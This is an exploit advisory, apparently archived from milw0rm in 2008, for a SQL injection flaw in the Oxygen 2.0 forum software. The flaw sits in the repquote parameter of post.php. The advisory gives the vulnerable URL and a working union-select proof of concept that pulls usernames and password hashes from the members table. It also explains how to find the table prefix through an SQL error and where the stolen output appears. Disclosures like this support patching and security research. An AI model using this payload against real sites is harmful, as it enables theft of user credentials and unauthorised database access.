34 lines
No EOL
1,019 B
Text
34 lines
No EOL
1,019 B
Text
######################
|
|
#
|
|
#Oxygen 2.0 SQL Injection Vulnerability
|
|
#
|
|
######################
|
|
#
|
|
#Bug by: h0yt3r
|
|
#
|
|
##
|
|
###
|
|
##
|
|
#
|
|
#This Board Software suffers from a not correctly verified quote ID variable which is used in SQL Querys.
|
|
#An Attacker can easily get sensitive information from the database by
|
|
#injecting unexpected SQL Querys.
|
|
#We need a valid topic ID.
|
|
#Im not bored enough to code an exploit for this, so do it manually.
|
|
#Its by the way easy to find the correct prefix for the tables by producing a SQL Error.
|
|
#When injected your Query you can find the output in the Subject Text Box.
|
|
#
|
|
#SQL Injection:
|
|
#http://[target]/[path]/post.php?action=reply&tid=2517&repquote=[Sequel]
|
|
#
|
|
#PoC:
|
|
#post.php?action=reply&tid=2517&repquote=-1'%20union%20select%20concat(username,0x3a,password),2,3,4,5,6%20from%20o2_members--+
|
|
#
|
|
#######################
|
|
#
|
|
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the (...) h4ck-y0u Team!
|
|
#
|
|
#######################
|
|
#######################
|
|
|
|
# milw0rm.com [2008-06-15] |